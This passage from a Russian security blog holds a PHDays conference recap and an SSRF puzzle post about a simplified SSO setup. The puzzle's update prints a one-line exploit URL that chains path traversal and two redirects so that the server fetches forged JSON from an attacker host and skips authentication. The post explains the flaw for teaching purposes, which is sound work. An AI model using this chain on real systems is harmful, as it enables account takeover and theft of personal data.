Фото с того дня прилагается (вид из отеля).</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuWVPR_W-CGiMWfsRIuLho6ddxOIU-BBcmGvweqEmwqdc2Mb4vk93vaQfFeqQJkzOVD7X1YbQVYMP0vbtr5eAJa4VMBpDouR7E6yhMvvckjHrpjBZt-jWApLyLFvV6EO8d6Tlt3PDDG9jA/s1600/WP_20130522_026%5B1%5D.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuWVPR_W-CGiMWfsRIuLho6ddxOIU-BBcmGvweqEmwqdc2Mb4vk93vaQfFeqQJkzOVD7X1YbQVYMP0vbtr5eAJa4VMBpDouR7E6yhMvvckjHrpjBZt-jWApLyLFvV6EO8d6Tlt3PDDG9jA/s400/WP_20130522_026%5B1%5D.jpg" width="400" /></a></div>
<div>
<br /></div>
<div>
<b>Stage 1.</b></div>
<div>
<b><br /></b></div>
<div style="text-align: justify;">
Первый день - это конечно встреча со старыми друзьями. Поэтому можете меня винить сколько угодно, но на доклады я фактически не ходил 8) Поэтому отзывов о том, что было круто не ждите (да-да). Тем не менее мне круто повезло (спасибо оргам) что поставили мой доклад одним из первых, это сильно облегчает дальнейшее времяпровождение ;) Так вот, доклад я уж кое как рассказал свой, выступая в параллельном треке с лучшими супер-спикерами - Алексеем Лукацким, Владимиром Жириновским, вот думал никто на мой доклад и не придет... но спасибо тем, кто пришли! Вы крутые! А те в другом зале позеры и не труЪ 8)))</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
(Кстати, про <a href="http://dlp-expert.ru/survey/bestspeaker">http://dlp-expert.ru/survey/bestspeaker</a> , теперь надо только Владимира Вольфовича добавить, что бы он Алексея из лидеров вынес нафиг!)</div>
<div style="text-align: justify;">
<br /></div>
<div>
<div style="text-align: justify;">
После своего доклада меня проводили в спикерс-рум, ибо голоден был я, а организаторы, добрейшие люди, заботились обо мне! Но тут Российские реалии. Володя, после своего спича то же решил спикерскими булочками развлечься видимо, поэтому его телохранитель преградил нам путь. Вот она демократия! Все спикеры равны! Все на баррикады, долой баринов, иш што задумали - булочки народные поедать! Но пост про еду уже был, так что я не буду продолжать эту тему ;) </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
В первый день, в одной из комнат был __секретное заседание__! Нас не пустили... Но конечно фото я сделал... секретное заседание за стеклянной дверь - вот оно будущее Российского ИБ:</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMAAPlWXK947THNK_jVStaTWZiQh5GZCxYbQZugNFnrDXGo0CWNBZnNSxpOalOWRNfyRmTo2XFj7MTiQZoDSPZ5dyZaRpvRJK_Lzv-Jv01p5lsxhCQUIH2eisA-AlacBugjdLpJPUWLLh5/s1600/WP_20130523_009%5B1%5D.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMAAPlWXK947THNK_jVStaTWZiQh5GZCxYbQZugNFnrDXGo0CWNBZnNSxpOalOWRNfyRmTo2XFj7MTiQZoDSPZ5dyZaRpvRJK_Lzv-Jv01p5lsxhCQUIH2eisA-AlacBugjdLpJPUWLLh5/s400/WP_20130523_009%5B1%5D.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
<span style="text-align: left;">На доске можно было что-то разобрать, к сожалению я не запаривался фотать доску, так что вот вам лица "шипонов". Нас, кстати, после этого фото попросили больше так не делать... </span></div>
<span style="text-align: left;"></span><br />
<div style="text-align: justify;">
<span style="text-align: left;">Дальше больше - через час у меня случился рабочий инцидент, и я стал искать укромное и тихое местечко, что бы спокойно поднять ВПН и разобрать ситуацию. Так вот сидел я тихо в каком-то коридорчике и вдруг слышу я как человек заходит (в коридорчик мой), меня он не видит (я за столбом) и не слышит и начинает по телефону трепаться как раз про это "секретное заседание". Прозвучали ФИО некого ФСБшника, его звание (вроде полковник, хз), затем что-то про безопасность СКАДы на сочинских объектах и проблемы которые там есть. Я рад, что кто-то этим занимается и обсуждают эти проблемы на самом, как мы можем убедиться, высоком уровне. Страна в безопасности! PHDays дало площадку для обсуждения этих проблем, что, конечно, здорово! </span></div>
<span style="text-align: left;">
</span>
<b style="text-align: left;"><br /></b>
<br />
<div class="separator" style="clear: both; text-align: justify;">
<span style="text-align: left;"><b>Stage 2.</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br style="text-align: left;" /></div>
<div style="text-align: justify;">
<span style="text-align: left;">Второй день, так же крут - я общался с добрыми друзьями, но в этот раз мы таки еще и приняли участие в мега угарном конкурсе - ЛабиринтЪ. Да все про него знают и читали, поэтому расскажу коротко - мы облажались. Мы прошли первый уровень(термодатчик), но к сожалению после того как наше время вышло(. С соц. инженерией было туго... мы стали думать не в том направлении и зациклились (нам потом сказали как надо было... эхх). С лазерами - ну что ж, жирные зады и координация уровня "так себе" не дала нам просунуться между лучами 8( Поиск жучков - нашли 3 из 4. Причем 3 нашли быстро, а 4 долго-долго искали. Зато с отмычками мы быстро и эффективно справились (сказалась ночная тренировка на болотоной...). Как нам сказал наш "смотритель", мы по замкам были на втором месте после Америкосов. Что ж. Хоть что-то смогли сделать хорошо. Остальное - никак. Ну и бомба взорвалось, упрощать уравнение было впадлу, поэтому мы спорили больше 8) Короче конкурс очень классный. Нам понравилось. </span></div>
<br />
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO42xJyjyOEHMshWKQBjLrwXHEpTz4pfe4G0pG5f5EtR2TGZkFV4v9gZtIBrQ72DcVFyjR6rkED6_B1h9kwjmIjs68GeGE0y9XHb_G5TPD2aVRB_8aW9Z_txS8QMER0esnaKbTFkc2ag_C/s1600/WP_20130524_009%5B1%5D.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO42xJyjyOEHMshWKQBjLrwXHEpTz4pfe4G0pG5f5EtR2TGZkFV4v9gZtIBrQ72DcVFyjR6rkED6_B1h9kwjmIjs68GeGE0y9XHb_G5TPD2aVRB_8aW9Z_txS8QMER0esnaKbTFkc2ag_C/s400/WP_20130524_009%5B1%5D.jpg" width="400" /></a></div>
<div>
<br />
<br />
<b>Final.</b></div>
<div>
<b><br /></b></div>
<div>
Как вы могли заметить, врайт-ап абсолютно ни о чем. Да на доклады я не ходил, только вот в конкурс поиграл. Все время уделял общению с друзьями. На самом деле, конфа была менее пафосная, по стилю, чем в прошлом году, но тем не менее более продуманная, как мне показалась по "сценарию". Хотя это ИМХО. Не хватало мест для общения 8) В среднем список докладов не "возбуждал", но было пару-тройка докладов с сильными и хорошими темами, правда-правда. Идея микса пиджаков и футболок ущербна и выглядит натянуто и искусственно, все таки чувствуется инородность контингента. Да кто-то пишет, что все находили "друг друга", но ИМХО, было два междусобойчика. Пиджаки с пиджаками, а футболки с футболками. Спасибо организаторам! Спасибо тем кто слушал доклады, и был на волне (а не как я). До встречи на <b>Zeronights</b>.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF0B8tRbkfcOEiuDdMzogdoucggGjhNozM38s2PAlPBMa1l_c9fELPyPfVoO9P6S2bZdvTBsZdMZTVi0hgiq1DLee9iXXvI3cDpCS1mS3lStycoZ3SnHR-VxTwkeakt3lBDMDAhk4lTBXj/s1600/WP_20130523_003%5B1%5D.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="295" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF0B8tRbkfcOEiuDdMzogdoucggGjhNozM38s2PAlPBMa1l_c9fELPyPfVoO9P6S2bZdvTBsZdMZTVi0hgiq1DLee9iXXvI3cDpCS1mS3lStycoZ3SnHR-VxTwkeakt3lBDMDAhk4lTBXj/s400/WP_20130523_003%5B1%5D.jpg" width="400" /></a></div>
<div>
<br /></div>
<div>
<br />
<br />
<br />
<br /></div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com0tag:blogger.com,1999:blog-4711612808026791519.post-52097329516998014572013-01-07T05:35:00.001-08:002014-10-23T03:07:53.054-07:00Интересный случай с SSRF.<div dir="ltr" style="text-align: left;" trbidi="on">
<b id="internal-source-marker_0.3253475003875792"><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">В последнее время в Интернетах и в узком кругу ИБ специалистов активно обсуждаются концепты, примеры и техники проведения “новой” атаки - SSRF. Хотелось бы рассказать об одной такой атаке. Данный случай интересен и тем, что его трудно классифицировать по существующим меркам “угроза-уязвимость”. То есть, есть конкретная атака и есть реализация конкретной угрозы, но если разбирать “уязвимости” отдельно, то угрозы - другие. И этот пример, на мой скромный взгляд, показывает, что “теория ИБ” и классификация в нашей теме - сильно отстает от практики и не всегда применима в том виде, что она есть сейчас.</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" />“Взломай меня полностью”</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"></span></b><br />
<a name='more'></a><b id="internal-source-marker_0.3253475003875792"><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">В качестве базы, для тех, кто не в курсе что есть SSRF атака, рекомендую к прочтению: <a href="http://andrepetukhov.wordpress.com/2012/11/09/%D1%82%D0%B5%D1%80%D0%BC%D0%B8%D0%BD%D1%8B-xxe-ssrf-%D0%B8-%D0%B2%D1%81%D0%B5-%D0%B2%D1%81%D0%B5-%D0%B2%D1%81%D0%B5/">http://andrepetukhov.wordpress.com/2012/11/09/%D1%82%D0%B5%D1%80%D0%BC%D0%B8%D0%BD%D1%8B-xxe-ssrf-%D0%B8-%D0%B2%D1%81%D0%B5-%D0%B2%D1%81%D0%B5-%D0%B2%D1%81%D0%B5/</a><br class="kix-line-break" /><br class="kix-line-break" />Для остальных и коротко: SSRF - Server-Side-Request-Forgery. Суть: атака, в результате который мы можем инициировать запросы с атакуемого хоста </span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">B</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"> на другие компоненты системы, например на хост </span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">C</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">. При этом у нас нет прямой возможности послать такой запрос на хост </span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">C</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">. Например хост </span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">C</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"> в локальной сети/DMZ. Таким вот образом мы можем делать разные интересные вещи. В некоторых интересных вариантах, хост </span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">C</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"> может быть тем же хостом </span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">B</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">, только локальный сетевой интерфейс не доступный из Интернетов (то есть атакующему). </span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">В данном посте я хочу рассказать о другом интересном случае проведения SSRF атаки. А хотя нет! Давайте интерактивно, я вам опишу систему, а вы сами проведете атаку в комментах! Победителю вышлю-вручу приз - резиновую уточку 8)</span></b><br />
<span style="font-family: Arial;"><span style="font-size: 15.199999809265137px; white-space: pre-wrap;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://pbs.twimg.com/media/A3KAUOaCQAEEgKN.jpg:large" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://pbs.twimg.com/media/A3KAUOaCQAEEgKN.jpg:large" width="320" /></a></div>
<span style="font-family: Arial;"><span style="font-size: 15.199999809265137px; white-space: pre-wrap;"><br /></span></span><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"></span>
<span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"><i>//Ответы от Андрея Петухова, Владимира Воронцова и Сашу Штукера не принимаются =)</i><br class="kix-line-break" /><br class="kix-line-break" />Дано:</span><br />
<span style="font-family: Arial; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><span style="font-weight: normal;"><br class="kix-line-break" />Имеется сеть сервисов, но нам будет интересен один только.</span>S1<span style="font-weight: normal;">: Сервер с персональными данными. Его надо “хакнуть”. Авторизация - Single Sign-On. </span></span><br />
<div dir="ltr" style="font-weight: normal; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<b id="internal-source-marker_0.3253475003875792"><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Host: s1.domain.com<br class="kix-line-break" /><span class="Apple-tab-span" style="white-space: pre;"> </span></span></b></div>
<div dir="ltr" style="font-weight: normal; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<b id="internal-source-marker_0.3253475003875792"><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">//Уязвимость 1 - open-redirect - https://s1.domain.com/?url=http://ya.ru</span></b></div>
<div dir="ltr" style="font-weight: normal; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<b id="internal-source-marker_0.3253475003875792"><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></b></div>
<span id="internal-source-marker_0.3253475003875792"><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"><span style="font-weight: normal;">Конечно есть сервер SSO.</span>SSO</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">: Сервер авторизации.</span><br /><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> <b> </b></span><b>Host: sso.domain.com</b><br class="kix-line-break" /><span class="Apple-tab-span" style="font-weight: normal; white-space: pre;"> </span></span><br /><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> <b> </b></span><b>//Уязвимсть 2 - redirect: https://sso.domain.com/?afterauth=http://s1.domain.com<br class="kix-line-break" /><span class="Apple-tab-span" style="white-space: pre;"> </span>//редирект работает только в для родного домена и списка сервисов!</b><br class="kix-line-break" /><br class="kix-line-break" />Документация:<br class="kix-line-break" /><span class="Apple-tab-span" style="font-weight: normal; white-space: pre;"> </span>Сервис проходит авторизацию по REST API.</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>1. Аутентифкация. Начало.</span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span>1.1. Сервис</span><span style="font-family: Arial; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> S1</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"> проверяет куку ‘code’. Если она не пуста, то готу 2.</span></span><br />
<div style="text-indent: 0px;">
<span style="font-family: Arial; font-size: 15px; text-indent: 36pt; white-space: pre-wrap;"> 1.2. Сервис делает редирект на сервис </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-indent: 36pt; white-space: pre-wrap;">SSO</span><span style="font-family: Arial; font-size: 15px; text-indent: 36pt; white-space: pre-wrap;">: https://sso.domain.com/getAuth?ID=S1</span></div>
<div style="text-indent: 0px;">
<span style="font-family: Arial; font-size: 15px; text-indent: 48px; white-space: pre-wrap;"> 1.3. </span><span style="font-family: Arial; font-size: 15px; font-weight: bold; text-indent: 48px; white-space: pre-wrap;">SSO</span><span style="font-family: Arial; font-size: 15px; text-indent: 48px; white-space: pre-wrap;"> проверяет PHPSESSIONID, если для данной сессии есть аутентифкационные данные, то делает обратный редирект по параметру ID=S1: https://s1.domain.com/authDone?code=0cc1166f5a3012a1bc3eafff018acb31, где code берется из данных сессии по соотвествующему ID. Если code там нет, то готу 1.7</span></div>
<div dir="ltr" style="font-weight: bold; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span id="internal-source-marker_0.3253475003875792"><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span style="font-weight: normal;">Если аутентификации по сессии нет, то готу 1.6</span></span></span><br />
<span style="font-family: Arial; font-size: 15px; font-weight: normal; white-space: pre-wrap;">1.4. </span><span style="font-family: Arial; font-size: 15px; white-space: pre-wrap;">S1</span><span style="font-family: Arial; font-size: 15px; font-weight: normal; white-space: pre-wrap;"> ставит куку code из параметра code.</span></div>
<span id="internal-source-marker_0.3253475003875792">
</span>
<br />
<div dir="ltr" style="font-weight: normal; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span id="internal-source-marker_0.3253475003875792"><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">1.5. готу 1.1</span></span></div>
<span id="internal-source-marker_0.3253475003875792">
</span>
<br />
<div dir="ltr" style="font-weight: bold; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span id="internal-source-marker_0.3253475003875792"><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span style="font-weight: normal;">1.6. Сервер </span>SSO<span style="font-weight: normal;"> просит ввести логин и проль поп-апом. Стандартная аутентификация в POST запросе на </span>SSO<span style="font-weight: normal;">, пример приводить не буду. Стандартно все. Если логин (don_huan например) и пароль верный, то для данная сессия считается аутентифицированной. Если нет, готу 2.6. (капча, csrf токены есть, если что)</span></span></span></div>
<span id="internal-source-marker_0.3253475003875792">
</span>
<br />
<div dir="ltr" style="font-weight: normal; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span id="internal-source-marker_0.3253475003875792"><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">1.7. Регистрируется код, записывается в сессию, проверяется что существует такой ID. Если что не так - ошибка. <br class="kix-line-break" />1.8 готу 1.3</span></span></div>
<span id="internal-source-marker_0.3253475003875792"></span><br />
<div dir="ltr" style="font-weight: normal; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span id="internal-source-marker_0.3253475003875792"><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">
2. Аутентификация - проверка.</span></span></div>
<span id="internal-source-marker_0.3253475003875792">
<div dir="ltr" style="font-weight: bold; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span style="font-weight: normal;">2.1. Берется <code> из куки как есть и генерируется REST API запрос c сервера S1 на </span>SSO<span style="font-weight: normal;"> (не видим пользователю), URL которого подписывается собственным секретным ключом сервера </span>S1<span style="font-weight: normal;">:<br class="kix-line-break" /><br class="kix-line-break" />GET https://sso.domain.com/api/check/<code> HTTP/1.1<br class="kix-line-break" />…<br class="kix-line-break" />Header-Signature: ashJiTfV537Gfcf64f8hg4FgDkkkA785F5g/hjkR4Ed==<br class="kix-line-break" />Header-ID: S1<br class="kix-line-break" />Header-Data: “https://sso.domain.com/api/check/<code>”</span></span></div>
<div dir="ltr" style="font-weight: normal; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">…</span></div>
<div dir="ltr" style="font-weight: bold; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span style="font-weight: normal;"><br class="kix-line-break" />2.3. Сервер </span>SSO<span style="font-weight: normal;"> проверяет подпись используя зарегистрированный открытый ключ S1. Проверяет подпись Header-Signature для Header-Data, есличто не так - ошибка, если все верно, то дальше.</span></span></div>
<div dir="ltr" style="font-weight: bold; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span style="font-weight: normal;">2.4. Скрипт обработчик на </span>SSO<span style="font-weight: normal;"> (/api/check/) проверяет что <code> зарегистрирован, если нет - то ошибка, иначе дальше.</span></span></div>
<div dir="ltr" style="font-weight: normal; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">2.5. Возвращается JSON :</span></div>
<span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"></span><br /><div dir="ltr" style="font-weight: normal; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">{registered_user:”don_huan”}</span></div>
<span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span id="internal-source-marker_0.3253475003875792"><div dir="ltr" style="font-weight: bold; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span style="font-weight: normal;">2.6 Сервер </span>S1<span style="font-weight: normal;"> считывает JSON ответ, и выдает пользователю его персональные данные по registered_user. Ну или ошибку, если нет такого пользователя.<br class="kix-line-break" /><br class="kix-line-break" /><br class="kix-line-break" />--------</span></span></div>
<span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="vertical-align: baseline;"><span style="font-family: Arial; font-weight: bold;"><span style="font-size: 15px; font-weight: normal; white-space: pre-wrap;">Как-то так. В принципе атака очевидна, но... какой эффект! Если есть вопросы - пишите в комментах, я отвечу 8) Варианты то же пишите. Напоминаю, что это был реальный случай, реальной атаки, а не просто теор-выкладка. Так же, после нахождения ответа интересно послушать то, как это можно классифицировать и какие были уязвимости? Кстати, это пример уязвимости, которую я нашел тупо чтением документации 8)
P.S. Все совпадения случайны. На самом деле там использовался OAuth, но мне лень было описывать алгоритмы OAuth таким макаром, поэтому я все cильно упростил в данной документации и </span></span><span style="font-family: Arial;"><span style="font-size: 15.199999809265137px; white-space: pre-wrap;">архитектуре</span></span><span style="font-family: Arial; font-weight: bold;"><span style="font-size: 15px; font-weight: normal; white-space: pre-wrap;"> - тем проще ;)</span></span></span></span></span><br />
<div>
<span style="vertical-align: baseline;"><span style="font-family: Arial; font-weight: bold;"><span style="font-size: 15px; font-weight: normal; white-space: pre-wrap;"><br /></span></span></span></div>
<div>
<span style="vertical-align: baseline;"><span style="font-family: Arial;"><span style="font-size: 15px; white-space: pre-wrap;"><b>UPD</b></span></span></span></div>
<div>
<span style="vertical-align: baseline;"><span style="font-family: Arial;"><span style="font-size: 15px; white-space: pre-wrap;"><b><br /></b></span></span></span></div>
<div>
<span style="font-family: Arial;"><span style="font-size: 15.199999809265137px; white-space: pre-wrap;">Задачу решил без проблем </span></span><a href="http://www.blogger.com/profile/16918471305442707785" rel="nofollow" style="background-color: #fff9ee; color: #888888; font-family: Georgia, Utopia, 'Palatino Linotype', Palatino, serif; font-size: 14px; font-weight: bold; line-height: 19px; text-decoration: initial;">i Sciurus</a><span style="font-family: Arial; font-size: 15.199999809265137px; white-space: pre-wrap;">.</span><br />
<span style="font-family: Arial;"><span style="font-size: 15.199999809265137px; white-space: pre-wrap;">
Эксплойт: </span></span></div>
<div>
<span style="background-color: #fff9ee; color: #222222; font-family: Georgia, Utopia, 'Palatino Linotype', Palatino, serif; font-size: 14px; line-height: 19px; text-align: justify;">3.1 Omisión de la autenticación</span></div>
<span style="background-color: #fff9ee; color: #222222; font-family: Georgia, Utopia, 'Palatino Linotype', Palatino, serif; font-size: 14px; line-height: 19px; text-align: justify;">https://s1.domain.com/authDone?code=../../?afterauth=http://s1.domain.com%3Furl=http://my.domain/get_any_json</span><br />
<div>
<span style="background-color: #fff9ee; color: #222222; font-family: Georgia, Utopia, 'Palatino Linotype', Palatino, serif; font-size: 14px; line-height: 19px; text-align: justify;"><br /></span></div>
<div style="text-align: justify;">
<span style="color: #222222; font-family: Georgia, Utopia, Palatino Linotype, Palatino, serif;"><span style="font-size: 14.399999618530273px; line-height: 19px;">Вот такая интересная, а главное простая и мощная SSRF атака. В чем ошибка?<br /><br />1. Работа по GET запросу в REST API</span></span></div>
<div style="text-align: justify;">
<span style="color: #222222; font-family: Georgia, Utopia, Palatino Linotype, Palatino, serif;"><span style="font-size: 14.399999618530273px; line-height: 19px;">---> Ну и что? Все запросы подписаны! Никто в этот API сунуться не сможет, он закрыт для Интернетов и открыт только для легитимных сервисов только.</span><br /><span style="font-size: 14.399999618530273px; line-height: 19px;">2. Не фильтруется значение токена: ></../?= и тд</span><br /><span style="font-size: 14.399999618530273px; line-height: 19px;">---> А зачем его фильтровать? Какая уязвимость тут? токен "*&%<xss.>\'SQL111" - просто вернет ошибку {error:'not found'}. Нет вектора. </span><br /><span style="font-size: 14.399999618530273px; line-height: 19px;">3. Redirect/OpenRedirect</span><br /><span style="font-size: 14.399999618530273px; line-height: 19px;">---> низкий приоритет, атака клиент-сайд.</span><br /><span style="font-size: 14.399999618530273px; line-height: 19px;">4. S1 обрабатывает редиректы HTTP, что позволяет его перекинуть на другой хост.</span></span></div>
<div style="text-align: justify;">
<span style="color: #222222; font-family: Georgia, Utopia, Palatino Linotype, Palatino, serif;"><span style="font-size: 14.399999618530273px; line-height: 19px;">---> Так редирект с SSO, который злоумышленник не контролирует</span></span></div>
<div style="text-align: justify;">
<span style="color: #222222; font-family: Georgia, Utopia, Palatino Linotype, Palatino, serif;"><br /><span style="font-size: 14.399999618530273px; line-height: 19px;">Вот так все по отдельности низкопробные баги, и даже совсем </span><b style="font-size: 14.399999618530273px; line-height: 19px;">не уязвимости(</b><span style="font-size: 14.399999618530273px; line-height: 19px;">кроме редиректа</span><b style="font-size: 14.399999618530273px; line-height: 19px;">)</b><span style="font-size: 14.399999618530273px; line-height: 19px;">, а функциональные мелочи. Но вот все вместе - атака, с хорошим, таким, ущербом. SSRF тут вообще без XXE/RFI как и говорил Андрей и без всяких враперов </span><strike style="font-size: 14.399999618530273px; line-height: 19px;">Владимира </strike><span style="font-size: 14.399999618530273px; line-height: 19px;"> (ц аолоди етсь шикарная дока, где эта тема раскрывается не только вертикально, но и горизонтально, что делает её крайне полезной, рекомендую - </span><span style="font-size: 14.399999618530273px; line-height: 19px;"><a href="https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit#">https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit#</a> </span></span><span style="color: #222222; font-family: Georgia, Utopia, 'Palatino Linotype', Palatino, serif; font-size: 14.399999618530273px; line-height: 19px;">)</span><span style="color: #222222; font-family: Georgia, Utopia, 'Palatino Linotype', Palatino, serif; font-size: 14.399999618530273px; line-height: 19px;">. Более того, изначально запрос вообще подписан! И третье, непосредственно выполняя атаку, нельзя поменять целевой хост (это стало возможным только с помощью двух redirect'ов). </span></div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com14tag:blogger.com,1999:blog-4711612808026791519.post-12623546703007765972012-11-28T08:26:00.000-08:002012-11-28T08:36:00.174-08:00На тему круглого стола...<div dir="ltr" style="text-align: left;" trbidi="on">
Ну вот, начало конца этого блога уже скоро 8) Тем не менее, иногда прет... да надо молчать, но иногда остановить некому, итак, блого-запись на тему Ресерчeров, девелоперов, баг-хантеров и ИБ индустрии...<br />
<br />
Преамбула.<br />
<br />
На прошедшей конфе #Zeronights эта тема была вынесена в отдельный поток "круглого стола", но тема зародилась давно, и уже мусолилась у Токсы, и на Риспе:<br />
<br />
<br />
<ul style="text-align: left;">
<li><a href="http://toxa.livejournal.com/552663.html">http://toxa.livejournal.com/552663.html</a></li>
